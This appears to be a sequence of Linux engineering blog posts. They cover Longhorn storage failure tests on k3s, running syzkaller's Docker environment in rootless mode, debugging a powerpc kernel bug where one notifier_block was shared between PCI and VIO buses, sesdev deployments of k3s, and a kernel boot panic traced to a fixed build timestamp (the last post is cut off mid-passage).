Ultimately node3 was rebooted and ended up stalled with the console requesting the root password for maintenance:
Meanwhile, Longhorn went and rebuilt a third replica on node2:
…and the volume remained usable the entire time:
master:~ # echo baz > /mnt/baz master:~ # ls /mnt bar baz foo lost+found
That’s perfect!
Looking at the Node screen we could see that node3 was still down:
That’s OK, I was able to fix node3. I logged in on the console and ran mkfs.ext4 /dev/vdb then brought the node back up again.The disk remained unschedulable, because Longhorn was still expecting the ‘old’ disk to be there (I assume based on the UUID stored in /var/lib/longhorn/longhorn-disk.cfg) and of course the ‘new’ disk is empty. So I used the Longhorn UI to disable scheduling for that ‘old’ disk, then deleted it. Shortly after, Longhorn recognised the ‘new’ disk mounted at /var/lib/longhorn and everything was back to green across the board.
So Longhorn recovered well from the backing store of one replica going bad. Next I thought I’d try to break it from the other end by running a volume out of space. What follows is possibly not a fair test, because what I did was create a single Longhorn volume larger than the underlying disks, then filled that up. In normal usage, I assume one would ensure there’s plenty of backing storage available to service multiple volumes, that individual volumes wouldn’t generally be expected to get more than a certain percentage full, and that some sort of monitoring and/or alerting would be in place to warn of disk pressure.
With four nodes, each with a single 8GB disk, and Longhorn apparently reserving 2.33GB by default on each disk, that means no Longhorn volume can physically store more than a bit over 5.5GB of data (see the Size column in the previous screenshot). Given that the default setting for Storage Over Provisioning Percentage is 200, we’re actually allowed to allocate up to a bit under 11GB.
So I went and created a 10GB volume, attached that to the master node, created a filesystem on it, and wrote a whole lot of zeros to it:
master:~ # mkfs.ext4 /dev/sda mke2fs 1.46.5 (30-Dec-2021) [...] master:~ # mount /dev/sda /mnt master:~ # df -h /mnt Filesystem Size Used Avail Use% Mounted on /dev/sda 9.8G 24K 9.3G 1% /mnt master:~ # dd if=/dev/zero of=/mnt/big-lot-of-zeros bs=1M status=progress 2357198848 bytes (2.4 GB, 2.2 GiB) copied, 107 s, 22.0 MB/s
While that dd was running, I was able to see the used space of the replicas increasing in the Longhorn UI:
After a few more minutes, the dd stalled…
master:~ # dd if=/dev/zero of=/mnt/big-lot-of-zeros bs=1M status=progress 9039773696 bytes (9.0 GB, 8.4 GiB) copied, 478 s, 18.9 MB/s
…there was a lot of unpleasantness on the master node’s console…
…the replicas became unschedulable due to lack of space…
…and finally the volume faulted:
Now what?
It turns out that Longhorn will actually recover if we’re able to somehow expand the disks that store the replicas. This is probably a good argument for backing Longhorn with an LVM volume on each node in real world deployments, because then you could just add another disk and extend the volume onto it. In my case though, given it’s all VMs and virtual block devices, I can actually just enlarge those devices. For each node then, I:
qemu-img resize /var/lib/libvirt/images/k3s-longhorn_$NODE-vdb.qcow2 +8Gresize2fs /dev/vdb to take advantage of the extra disk space.After doing that to node1, Longhorn realised there was enough space there and brought node1’s replica of my 10GB volume back online. It also summarily discarded the other two replicas from the still-full disks on node2 and node3, which didn’t yet have enough free space to be useful:
As I repeated the virtual disk expansion on the other nodes, Longhorn happily went off and recreated the missing replicas:
Finally I could re-attach the volume to the master node, and have a look to see how many of my zeros were actually written to the volume:
master:~ # cat /proc/partitions major minor #blocks name 254 0 44040192 vda 254 1 2048 vda1 254 2 20480 vda2 254 3 44016623 vda3 8 0 10485760 sda master:~ # mount /dev/sda /mnt master:~ # ls -l /mnt total 7839764 -rw-r--r-- 1 root root 8027897856 May 3 04:41 big-lot-of-zeros drwx------ 2 root root 16384 May 3 04:34 lost+found
Recall that dd claimed to have written 9039773696 bytes before it stalled when the volume faulted, so I guess that last gigabyte of zeros is lost in the aether. But, recall also that this isn’t really a fair test – one overprovisioned volume deliberately being quickly and deliberately filled to breaking point vs. a production deployment with (presumably) multiple volumes that don’t fill quite so fast, and where one is hopefully paying at least a little bit of attention to disk pressure as time goes by.
It’s worth noting that in a situation where there are multiple Longhorn volumes, assuming one disk or LVM volume per node, the replicas will all share the same underlying disks, and once those disks are full it seems all the Longhorn volumes backed by them will fault. Given multiple Longhorn volumes, one solution – rather than expanding the underlying disks – is simply to delete a volume or two if you can stand to lose the data, or maybe delete some snapshots (I didn’t try the latter yet). Once there’s enough free space, the remaining volumes will come back online. If you’re really worried about this failure mode, you could always just disable overprovisioning in the first place – whether this makes sense or not will really depend on your workloads and their data usage patterns.
All in all, like I said earlier, I think Longhorn behaved pretty well given what I did to it. Some more information in the event log could perhaps be beneficial though. In the UI I can see warnings from longhorn-node-controller e.g. “the disk default-disk-1cdbc4e904539d26(/var/lib/longhorn/) on the node node1 has 3879731200 available, but requires reserved 2505089433, minimal 25% to schedule more replicas” and warnings from longhorn-engine-controller e.g. “Detected replica overprovisioned-r-73d18ad6 (10.42.3.19:10000) in error“, but I couldn’t find anything really obvious like “Dude, your disks are totally full!”
Later, I found more detail in the engine manager logs after generating a support bundle ([…] level=error msg=”I/O error” error=”tcp://10.42.4.34:10000: write /host/var/lib/longhorn/replicas/overprovisioned-c3b9b547/volume-head-003.img: no space left on device”) so the error information is available – maybe it’s just a matter of learning where to look for it.
The other day, for the first time in a while, I wanted to do something with syzkaller, a system call fuzzer that has been used to find literally thousands of kernel bugs. As it turns out, since the last time I had done any work on syzkaller, I switched to a new laptop, and so I needed to set up a few things in my development environment again.
While I was doing this, I took a look at the syzkaller source again and found a neat little script called syz-env, which uses a Docker image to provide you with a standardised environment that has all the necessary tools and dependencies preinstalled.
I decided to give it a go, and then realised I hadn't actually installed Docker since getting my new laptop. So I went to do that, and along the way I discovered rootless mode, and decided to give it a try.
As of relatively recently, Docker supports rootless mode, which allows you to run your dockerd as a non-root user. This is helpful for security, as traditional "rootful" Docker can trivially be used to obtain root privileges outside of a container. Rootless Docker is implemented using RootlessKit (a fancy replacement for fakeroot that uses user namespaces) to create a new user namespace that maps the UID of the user running dockerd to 0.
You can find more information, including details of the various restrictions that apply to rootless setups, in the Docker documentation.
I ran tools/syz-env make to test things out. It pulled the container image, then gave me some strange errors:
ajd@jarvis-debian:~/syzkaller$ tools/syz-env make NCORES=1
gcr.io/syzkaller/env:latest
warning: Not a git repository. Use --no-index to compare two paths outside a working tree
usage: git diff --no-index [<options>] <path> <path>
...
fatal: detected dubious ownership in repository at '/syzkaller/gopath/src/github.com/google/syzkaller'
To add an exception for this directory, call:
git config --global --add safe.directory /syzkaller/gopath/src/github.com/google/syzkaller
fatal: detected dubious ownership in repository at '/syzkaller/gopath/src/github.com/google/syzkaller'
To add an exception for this directory, call:
git config --global --add safe.directory /syzkaller/gopath/src/github.com/google/syzkaller
go list -f '{{.Stale}}' ./sys/syz-sysgen | grep -q false || go install ./sys/syz-sysgen
error obtaining VCS status: exit status 128
Use -buildvcs=false to disable VCS stamping.
error obtaining VCS status: exit status 128
Use -buildvcs=false to disable VCS stamping.
make: *** [Makefile:155: descriptions] Error 1
After a bit of digging, I found that syz-env mounts the syzkaller source directory inside the container as a volume. make was running with UID 1000, while the files in the mounted volume appeared to be owned by root.
Reading the script, it turns out that syz-env invokes docker run with the --user option to set the UID inside the container to match the user's UID outside the container, to ensure that file ownership and permissions behave as expected.
This works in rootful Docker, where files appear inside the container to be owned by the same UID as they are outside the container. However, it breaks in rootless mode: due to the way RootlessKit sets up the namespaces, the user's UID is mapped to 0, causing the files to appear to be owned by root.
The workaround seemed pretty obvious: just skip the --user flag if running rootless.
It took me quite a while, as a total Docker non-expert, to figure out how to definitively check whether the Docker daemon is running rootless or not. There's a variety of ways you could do this, such as checking the name of the current Docker context to see if it's called rootless (as used by the Docker rootless setup scripts), but I think the approach I settled on is the most correct one.
If you want to check whether your Docker daemon is running in rootless mode, use docker info to query the daemon's security options, and check for the rootless option.
docker info -f "{{println .SecurityOptions}}" | grep rootless
If this prints something like:
[name=seccomp,profile=builtin name=rootless name=cgroupns]
then you're running rootless.
If not, then you're running the traditional rootful.
Easy! (And I sent a fix which is now merged into syzkaller!)
I was happily minding my own business one fateful afternoon when I received the following kernel bug report:
BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00
Read of size 4 at addr c000000264c26fdc by task swapper/0/1
Call Trace:
dump_stack_lvl+0x1bc/0x2b8 (unreliable)
print_report+0x3f4/0xc60
kasan_report+0x244/0x698
__asan_load4+0xe8/0x250
vga_arbiter_add_pci_device+0x60/0xe00
pci_notify+0x88/0x444
notifier_call_chain+0x104/0x320
blocking_notifier_call_chain+0xa0/0x140
device_add+0xac8/0x1d30
device_register+0x58/0x80
vio_register_device_node+0x9ac/0xce0
vio_bus_scan_register_devices+0xc4/0x13c
__machine_initcall_pseries_vio_device_init+0x94/0xf0
do_one_initcall+0x12c/0xaa8
kernel_init_freeable+0xa48/0xba8
kernel_init+0x64/0x400
ret_from_kernel_thread+0x5c/0x64
OK, so KASAN has helpfully found an out-of-bounds access in vga_arbiter_add_pci_device(). What the heck is that?
I'd never heard of the VGA arbiter in the kernel (do kids these days know what VGA is?), or vgaarb as it's called. What it does is irrelevant to this bug, but I found the history pretty interesting! Benjamin Herrenschmidt proposed VGA arbitration back in 2005 as a way of resolving conflicts between multiple legacy VGA devices that want to use the same address assignments. This was previously handled in userspace by the X server, but issues arose with multiple X servers on the same machine. Plus, it's probably not a good idea for this kind of thing to be handled by userspace. You can read more about the VGA arbiter in the kernel docs, but it's probably not something anyone has thought much about in a long time.
static bool vga_arbiter_add_pci_device(struct pci_dev *pdev)
{
struct vga_device *vgadev;
unsigned long flags;
struct pci_bus *bus;
struct pci_dev *bridge;
u16 cmd;
/* Only deal with VGA class devices */
if ((pdev->class >> 8) != PCI_CLASS_DISPLAY_VGA)
return false;
We're blowing up on the read to pdev->class, and it's not something like the data being uninitialised, it's out-of-bounds. If we look back at the call trace:
vga_arbiter_add_pci_device+0x60/0xe00
pci_notify+0x88/0x444
notifier_call_chain+0x104/0x320
blocking_notifier_call_chain+0xa0/0x140
device_add+0xac8/0x1d30
device_register+0x58/0x80
vio_register_device_node+0x9ac/0xce0
vio_bus_scan_register_devices+0xc4/0x13c
This thing is a VIO device, not a PCI device! Let's jump into the caller, pci_notify(), to find out how we got our pdev.
static int pci_notify(struct notifier_block *nb, unsigned long action,
void *data)
{
struct device *dev = data;
struct pci_dev *pdev = to_pci_dev(dev);
So pci_notify() gets called with our VIO device (somehow), and we're converting that struct device into a struct pci_dev with no error checking. We could solve this particular bug by just checking that our device is actually a PCI device before we proceed - but we're in a function called pci_notify, we're expecting a PCI device to come in, so this would just be a bandaid.
to_pci_dev() works like other struct containers in the kernel - struct pci_dev contains a struct device as a member, so the container_of() function returns an address based on where a struct pci_dev would have to be if the given struct device was actually a PCI device. Since we know it's not actually a PCI device and this struct device does not actually sit inside a struct pci_dev, our pdev is now pointing to some random place in memory, hence our access to a member like class is caught by KASAN.
Now we know why and how we're blowing up, but we still don't understand how we got here, so let's back up further.
The kernel's device subsystem allows consumers to register callbacks so that they can be notified of a given event. I'm not going to go into a ton of detail on how they work, because I don't fully understand myself, and there's a lot of internals of the device subsystem involved. The best references I could find for this are notifier.h, and for our purposes here, the register notifier functions in bus.h.
Something's clearly gone awry if we can end up in a function named pci_notify() without passing it a PCI device. We find where the notifier is registered in vgaarb.c here:
static struct notifier_block pci_notifier = {
.notifier_call = pci_notify,
};
static int __init vga_arb_device_init(void)
{
/* some stuff removed here... */
bus_register_notifier(&pci_bus_type, &pci_notifier);
This all looks sane. A blocking notifier is registered so that pci_notify() gets called whenever there's a notification going out to PCI buses. Our VIO device is distinctly not on a PCI bus, and in my debugging I couldn't find any potential causes of such confusion, so how on earth is a notification for PCI buses being applied to our non-PCI device?
Deep in the guts of the device subsystem, if we have a look at device_add() we find the following:
int device_add(struct device *dev)
{
/* lots of device init stuff... */
if (dev->bus)
blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
BUS_NOTIFY_ADD_DEVICE, dev);
If the device we're initialising is attached to a bus, then we call the bus notifier of that bus with the BUS_NOTIFY_ADD_DEVICE notification, and the device in question. So we're going through the process of adding a VIO device, and somehow calling into a notifier that's only registered for PCI devices. I did a bunch of debugging to see if our VIO device was somehow malformed and pointing to a PCI bus, or the struct subsys_private (that's the bus->p above) was somehow pointing to the wrong place, but everything seemed sane. My thesis of there being confusion while matching devices to buses was getting harder to justify - everything still looked sane.
I do not like debuggers. I am an avid printk() enthusiast. There's no real justification for this, a bunch of my problems could almost certainly be solved easier by using actual tools, but my brain seemingly enjoys the routine of printing and building and running until I figure out what's going on. It was becoming increasingly obvious, however, that printk could not save me here, and we needed to go deeper.
Very thankfully for me, even though this bug was discovered on real hardware, it reproduces easily in QEMU, making iteration easy. With GDB attached to QEMU, it's time to dive in to the guts of this issue and figure out what's happening.
Somehow, VIO buses are ending up with pci_notify() in their bus_notifier list. Let's break down the data structures here with a look at struct notifier_block:
struct notifier_block {
notifier_fn_t notifier_call;
struct notifier_block __rcu *next;
int priority;
};
So notifier chains are singly linked lists. Callbacks are registered through functions like bus_register_notifier(), then after a long chain of breadcrumbs we reach notifier_chain_register() which walks the list of ->next pointers until it reaches NULL, at which point it sets ->next of the tail node to the struct notifier_block that was passed in. It's very important to note here that the data being appended to the list here is not just the callback function (i.e. pci_notify()), but the struct notifier_block itself (i.e. struct notifier_block pci_notifier from earlier). There's no new data being initialised, just updating a pointer to the object that was passed by the caller.
If you've guessed what our bug is at this point, great job! If the same struct notifier_block gets registered to two different bus types, then both of their bus_notifier fields will point to the same memory, and any further notifiers registered to either bus will end up being referenced by both since they walk through the same node.
So we bust out the debugger and start looking at what ends up in bus_notifier for PCI and VIO buses with breakpoints and watchpoints.
Walking the bus_notifier list gave me the following:
__gcov_.perf_trace_module_free
fail_iommu_bus_notify
isa_bridge_notify
ppc_pci_unmap_irq_line
eeh_device_notifier
iommu_bus_notifier
tce_iommu_bus_notifier
pci_notify
Time to find out if our assumption is correct - the same struct notifier_block is being registered to both bus types. Let's start going through them!
First up, we have __gcov_.perf_trace_module_free. Thankfully, I recognised this as complete bait. Trying to figure out what gcov and perf are doing here is going to be its own giant rabbit hole, and unless building without gcov makes our problem disappear, we skip this one and keep on looking. Rabbit holes in the kernel never end, we have to be strategic with our time!
Next, we reach fail_iommu_bus_notify, so let's take a look at that.
static struct notifier_block fail_iommu_bus_notifier = {
.notifier_call = fail_iommu_bus_notify
};
static int __init fail_iommu_setup(void)
{
#ifdef CONFIG_PCI
bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
#endif
#ifdef CONFIG_IBMVIO
bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
#endif
return 0;
}
Sure enough, here's our bug. The same node is being registered to two different bus types:
+------------------+
| PCI bus_notifier \
+------------------+\
\+-------------------------+ +-----------------+ +------------+
| fail_iommu_bus_notifier |----| PCI + VIO stuff |----| pci_notify |
/+-------------------------+ +-----------------+ +------------+
+------------------+/
| VIO bus_notifier /
+------------------+
when it should be like:
+------------------+ +-----------------------------+ +-----------+ +------------+
| PCI bus_notifier |----| fail_iommu_pci_bus_notifier |----| PCI stuff |----| pci_notify |
+------------------+ +-----------------------------+ +-----------+ +------------+
+------------------+ +-----------------------------+ +-----------+
| VIO bus_notifier |----| fail_iommu_vio_bus_notifier |----| VIO stuff |
+------------------+ +-----------------------------+ +-----------+
Ultimately, the fix turned out to be pretty simple:
Author: Russell Currey <ruscur@russell.cc>
Date: Wed Mar 22 14:37:42 2023 +1100
powerpc/iommu: Fix notifiers being shared by PCI and VIO buses
fail_iommu_setup() registers the fail_iommu_bus_notifier struct to both
PCI and VIO buses. struct notifier_block is a linked list node, so this
causes any notifiers later registered to either bus type to also be
registered to the other since they share the same node.
This causes issues in (at least) the vgaarb code, which registers a
notifier for PCI buses. pci_notify() ends up being called on a vio
device, converted with to_pci_dev() even though it's not a PCI device,
and finally makes a bad access in vga_arbiter_add_pci_device() as
discovered with KASAN:
[stack trace redacted, see above]
Fix this by creating separate notifier_block structs for each bus type.
Fixes: d6b9a81b2a45 ("powerpc: IOMMU fault injection")
Reported-by: Nageswara R Sastry <rnsastry@linux.ibm.com>
Signed-off-by: Russell Currey <ruscur@russell.cc>
diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
index ee95937bdaf1..6f1117fe3870 100644
--- a/arch/powerpc/kernel/iommu.c
+++ b/arch/powerpc/kernel/iommu.c
@@ -171,17 +171,26 @@ static int fail_iommu_bus_notify(struct notifier_block *nb,
return 0;
}
-static struct notifier_block fail_iommu_bus_notifier = {
+/*
+ * PCI and VIO buses need separate notifier_block structs, since they're linked
+ * list nodes. Sharing a notifier_block would mean that any notifiers later
+ * registered for PCI buses would also get called by VIO buses and vice versa.
+ */
+static struct notifier_block fail_iommu_pci_bus_notifier = {
+ .notifier_call = fail_iommu_bus_notify
+};
+
+static struct notifier_block fail_iommu_vio_bus_notifier = {
.notifier_call = fail_iommu_bus_notify
};
static int __init fail_iommu_setup(void)
{
#ifdef CONFIG_PCI
- bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
+ bus_register_notifier(&pci_bus_type, &fail_iommu_pci_bus_notifier);
#endif
#ifdef CONFIG_IBMVIO
- bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
+ bus_register_notifier(&vio_bus_type, &fail_iommu_vio_bus_notifier);
#endif
return 0;
Easy! Problem solved. The commit that introduced this bug back in 2012 was written by the legendary Anton Blanchard, so it's always a treat to discover an Anton bug. Ultimately this bug is of little consequence, but it's always fun to catch dormant issues with powerful tools like KASAN.
I think this bug provides a nice window into what kernel debugging can be like. Thankfully, things are made easier by not dealing with any specific hardware and being easily reproducible in QEMU.
Bugs like this have an absurd amount of underlying complexity, but you rarely need to understand all of it to comprehend the situation and discover the issue. I spent way too much time digging into device subsystem internals, when the odds of the issue lying within were quite low - the combination of IBM VIO devices and VGA arbitration isn't exactly common, so searching for potential issues within the guts of a heavily utilised subsystem isn't going to yield results very often.
Is there something haunted in the device subsystem? Is there something haunted inside the notifier handlers? It's possible, but assuming the core guts of the kernel have a baseline level of sanity helps to let you stay focused on the parts more likely to be relevant.
Finally, the process was made much easier by having good code navigation. A ludicrous amount of kernel developers still use plain vim or Emacs, maybe with tags if you're lucky, and get by on git grep (not even ripgrep!) and memory. Sort yourselves out and get yourself an editor with LSP support. I personally use Doom Emacs with clangd, and with the amount of jumping around the kernel I had to do to solve this bug, it would've been a much bigger ordeal without that power.
If you enjoyed the read, why not follow me on Mastodon or checkout Ben's recount of another cursed bug! Thanks for stopping by.
We – that is to say the storage team at SUSE – have a tool we’ve been using for the past few years to help with development and testing of Ceph on SUSE Linux. It’s called sesdev because it was created largely for SES (SUSE Enterprise Storage) development. It’s essentially a wrapper around vagrant and libvirt that will spin up clusters of VMs running openSUSE or SLES, then deploy Ceph on them. You would never use such clusters in production, but it’s really nice to be able to easily spin up a cluster for testing purposes that behaves something like a real cluster would, then throw it away when you’re done.
I’ve recently been trying to spend more time playing with Kubernetes, which means I wanted to be able to spin up clusters of VMs running openSUSE or SLES, then deploy Kubernetes on them, then throw the clusters away when I was done, or when I broke something horribly and wanted to start over. Yes, I know there’s a bunch of other tools for doing toy Kubernetes deployments (minikube comes to mind), but given I already had sesdev and was pretty familiar with it, I thought it’d be worthwhile seeing if I could teach it to deploy k3s, a particularly lightweight version of Kubernetes. Turns out that wasn’t too difficult, so now I can do this:
> sesdev create k3s === Creating deployment "k3s" with the following configuration === Deployment-wide parameters (applicable to all VMs in deployment): deployment ID: k3s number of VMs: 5 version: k3s OS: tumbleweed public network: 10.20.190.0/24 Proceed with deployment (y=yes, n=no, d=show details) ? [y]: y === Running shell command === vagrant up --no-destroy-on-error --provision Bringing machine 'master' up with 'libvirt' provider... Bringing machine 'node1' up with 'libvirt' provider... Bringing machine 'node2' up with 'libvirt' provider... Bringing machine 'node3' up with 'libvirt' provider... Bringing machine 'node4' up with 'libvirt' provider... [... wait a few minutes (there's lots more log information output here in real life) ...] === Deployment Finished === You can login into the cluster with: $ sesdev ssh k3s
…and then I can do this:
> sesdev ssh k3s Last login: Fri Mar 24 11:50:15 CET 2023 from 10.20.190.204 on ssh Have a lot of fun… master:~ # kubectl get nodes NAME STATUS ROLES AGE VERSION master Ready control-plane,master 5m16s v1.25.7+k3s1 node2 Ready 2m17s v1.25.7+k3s1 node1 Ready 2m15s v1.25.7+k3s1 node3 Ready 2m16s v1.25.7+k3s1 node4 Ready 2m16s v1.25.7+k3s1 master:~ # kubectl get pods -A NAMESPACE NAME READY STATUS RESTARTS AGE kube-system local-path-provisioner-79f67d76f8-rpj4d 1/1 Running 0 5m9s kube-system metrics-server-5f9f776df5-rsqhb 1/1 Running 0 5m9s kube-system coredns-597584b69b-xh4p7 1/1 Running 0 5m9s kube-system helm-install-traefik-crd-zz2ld 0/1 Completed 0 5m10s kube-system helm-install-traefik-ckdsr 0/1 Completed 1 5m10s kube-system svclb-traefik-952808e4-5txd7 2/2 Running 0 3m55s kube-system traefik-66c46d954f-pgnv8 1/1 Running 0 3m55s kube-system svclb-traefik-952808e4-dkkp6 2/2 Running 0 2m25s kube-system svclb-traefik-952808e4-7wk6l 2/2 Running 0 2m13s kube-system svclb-traefik-952808e4-chmbx 2/2 Running 0 2m14s kube-system svclb-traefik-952808e4-k7hrw 2/2 Running 0 2m14s
…and then I can make a mess with kubectl apply, helm, etc.
One thing that sesdev knows how to do is deploy VMs with extra virtual disks. This functionality is there for Ceph deployments, but there’s no reason we can’t turn it on when deploying k3s:
> sesdev create k3s --num-disks=2
> sesdev ssh k3s
master:~ # for node in \
$(kubectl get nodes -o 'jsonpath={.items[*].metadata.name}') ;
do echo $node ; ssh $node cat /proc/partitions ; done
master
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
node3
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
253 16 8388608 vdb
253 32 8388608 vdc
node2
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
253 16 8388608 vdb
253 32 8388608 vdc
node4
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
253 16 8388608 vdb
253 32 8388608 vdc
node1
major minor #blocks name
253 0 44040192 vda
253 1 2048 vda1
253 2 20480 vda2
253 3 44016623 vda3
253 16 8388608 vdb
253 32 8388608 vdc
As you can see this gives all the worker nodes an extra two 8GB virtual disks. I suspect this may make sesdev an interesting tool for testing other Kubernetes based storage systems such as Longhorn, but I haven’t tried that yet.
I've recently been working on internal CI infrastructure for testing kernels before sending them to the mailing list. As part of this effort, I became interested in reproducible builds. Minimising the changing parts outside of the source tree itself could improve consistency and ccache hits, which is great for trying to make the CI faster and more reproducible across different machines. This means removing 'external' factors like timestamps from the build process, because the time changes every build and means the results between builds of the same tree are no longer identical binaries. This also prevents using previously cached results, potentially slowing down builds (though it turns out the kernel does a good job of limiting the scope of where timestamps appear in the build).
As part of this effort, I came across the KBUILD_BUILD_TIMESTAMP environment variable. This variable is used to set the kernel timestamp, which is primarily for any users who want to know when their kernel was built. That's mostly irrelevant for our work, so an easy KBUILD_BUILD_TIMESTAMP=0 later and... it still uses the current date.
Ok, checking the documentation it says
Setting this to a date string overrides the timestamp used in the UTS_VERSION definition (uname -v in the running kernel). The value has to be a string that can be passed to date -d. The default value is the output of the date command at one point during build.
So it looks like the timestamp variable is actually expected to be a date format. To make it obvious that it's not a 'real' date, let's set KBUILD_BUILD_TIMESTAMP=0000-01-01. A bunch of zeroes (and the ones to make it a valid month and day) should tip off anyone to the fact it's invalid.
As an aside, this is a different date to what I tried to set it to earlier; a 'timestamp' typically refers to the number of seconds since the UNIX epoch (1970), so my first attempt would have corresponded to 1970-01-01. But given we're passing a date, not a timestamp, there should be no problem setting it back to the year 0. And I like the aesthetics of 0000 over 1970.
Building and booting the kernel, we see #1 SMP 0000-01-01 printed as the build timestamp. Success! After confirming everything works, I set the environment variable in the CI jobs and call it a day.
A few days later I need to run the CI to test my patches, and something strange happens. It builds fine, but the boot tests that load a root disk image fail inexplicably: there is a kernel panic saying "VFS: Unable to mount root fs on unknown-block(253,2)".
[ 0.909648][ T1] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,2)
[ 0.909797][ T1] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.3.0-rc2-g065ffaee7389 #8
[ 0.909880][ T1] Hardware name: IBM pSeries (emulated by qemu) POWER8 (raw) 0x4d0200 0xf000004 of:SLOF,HEAD pSeries
[ 0.910044][ T1] Call Trace:
[ 0.910107][ T1] [c000000003643b00] [c000000000fb6f9c] dump_stack_lvl+0x70/0xa0 (unreliable)
[ 0.910378][ T1] [c000000003643b30] [c000000000144e34] panic+0x178/0x424
[ 0.910423][ T1] [c000000003643bd0] [c000000002005144] mount_block_root+0x1d0/0x2bc
[ 0.910457][ T1] [c000000003643ca0] [c000000002005720] prepare_namespace+0x1d4/0x22c
[ 0.910487][ T1] [c000000003643d20] [c000000002004b04] kernel_init_freeable+0x36c/0x3bc
[ 0.910517][ T1] [c000000003643df0] [c000000000013830] kernel_init+0x30/0x1a0
[ 0.910549][ T1] [c000000003643e50] [c00000000000df94] ret_from_kernel_thread+0x5c/0x64
[ 0.910587][ T1] --- interrupt: 0 at 0x0
[ 0.910794][ T1] NIP: 0000000000000000 LR: 0000000000000000 CTR: 0000000000000000
[ 0.910828][ T1] REGS: c000000003643e80 TRAP: 0000 Not tainted (6.3.0-rc2-g065ffaee7389)
[ 0.910883][ T1] MSR: 0000000000000000 <> CR: 00000000 XER: 00000000
[ 0.910990][ T1] CFAR: 0000000000000000 IRQMASK: 0
[ 0.910990][ T1] GPR00: 0000000000000000 c000000003644000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR04: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR08: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR12: 0000000000000000 0000000000000000 c000000000013808 0000000000000000
[ 0.910990][ T1] GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR20: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR24: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.910990][ T1] GPR28: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
[ 0.911371][ T1] NIP [0000000000000000] 0x0
[ 0.911397][ T1] LR [0000000000000000] 0x0
[ 0.911427][ T1] --- interrupt: 0
qemu-system-ppc64: OS terminated: OS panic: VFS: Unable to mount root fs on unknown-block(253,2)
Above the panic was some more context, saying
[ 0.906194][ T1] Warning: unable to open an initial console.
...
[ 0.908321][ T1] VFS: Cannot open root device "vda2" or unknown-block(253,2): error -2
[ 0.908356][ T1] Please append a correct "root=" boot option; here are the available partitions:
[ 0.908528][ T1] 0100 65536 ram0
[ 0.908657][ T1] (driver?)
[ 0.908735][ T1] 0101 65536 ram1
[ 0.908744][ T1] (driver?)
...
[ 0.909216][ T1] 010f 65536 ram15
[ 0.909226][ T1] (driver?)
[ 0.909265][ T1] fd00 5242880 vda
[ 0.909282][ T1] driver: virtio_blk
[ 0.909335][ T1] fd01 4096 vda1 d1f35394-01
[ 0.909364][ T1]
[ 0.909401][ T1] fd02 5237760 vda2 d1f35394-02
[ 0.909408][ T1]
[ 0.909441][ T1] fd10 366 vdb
[ 0.909446][ T1] driver: virtio_blk
[ 0.909479][ T1] 0b00 1048575 sr0
[ 0.909486][ T1] driver: sr
This is even more baffling: if it's unable to open a console, then what am I reading these messages on? And error -2, or ENOENT, on opening 'vda2' implies that no such file or directory exists. But it then lists vda2 as a present drive with a known driver? So is vda2 missing or not?
As you've read the title of this article, you can probably guess as to what changed to cause this error. But at the time I had no idea what could have been the cause. I'd already confirmed that a kernel with a set timestamp can boot to userspace, and there was another (seemingly) far more likely candidate for the failure: as part of the CI design, patches are extracted from the submitted branch and rebased onto the maintainer's tree. This is great from a convenience perspective, because you don't need to worry about forgetting to rebase your patches before testing and submission. But if the maintainer has synced their branch with Linus' tree it means there could be a lot of things changed in the source tree between runs, even if they were only a few days apart.
So, when you're faced with a working test on one commit and a broken test on another commit, it's time to break out the git bisect. Downloading the kernel images from the relevant CI jobs, I confirmed that indeed one was working while the other was broken. So I bisected the relevant commits, and... everything kept working. Each step I would build and boot the kernel, and each step would reach userspace just fine. I was getting suspicious at this point, so skipped ahead to the known bad commit and built and tested it locally. It also worked.
This was highly confusing, because it meant there was something fishy going on. Some kind of state outside of the kernel tree. Could it be... surely not...
Comparing the boot logs of the two CI kernels, I see that the working one indeed uses an actual timestamp, and the broken one uses the 0000-01-01 fixed date. Oh no. Setting the timestamp with a local build, I can now reproduce the boot panic with a kernel I built myself.
OK, so it's obvious at this point that the timestamp is affecting loading a root disk somehow. But why? The obvious answer is that it's before the UNIX epoch. Something in the build process is turning the date into an actual timestamp, and going wrong when that timestamp gets used for something.
But it's not like there was a build error complaining about it. As best I could tell, the kernel doesn't try to parse the date anywhere, besides passing it to date during the build. And if date had an issue with it, it would have broken the build. Not booting the kernel. There's no date utility being invoked during kernel boot!
Regardless, I set about tracing the usage of KBUILD_BUILD_TIMESTAMP inside the kernel. The stacktrace in the panic gave the end point of the search; the function mount_block_root() wasn't happy. So all I had to do was work out at which point mount_block_root() tried to access the KBUILD_BUILD_TIMESTAMP value.
In short, that went nowhere.
mount_block_root() effectively just tries to open a file in the filesystem. There's massive amounts of code handling this, and any part could have had the undocumented dependency on KBUILD_BUILD_TIMESTAMP. Approaching from the other direction, KBUILD_BUILD_TIMESTAMP is turned into build-timestamp inside a Makefile, which is in turn related to a file include/generated/utsversion.h. This file #defines UTS_VERSION equal to the KBUILD_BUILD_TIMESTAMP value. Searching the kernel for UTS_VERSION, we hit init/version-timestamp.c which stores it in a struct with other build information:
struct uts_namespace init_uts_ns = {
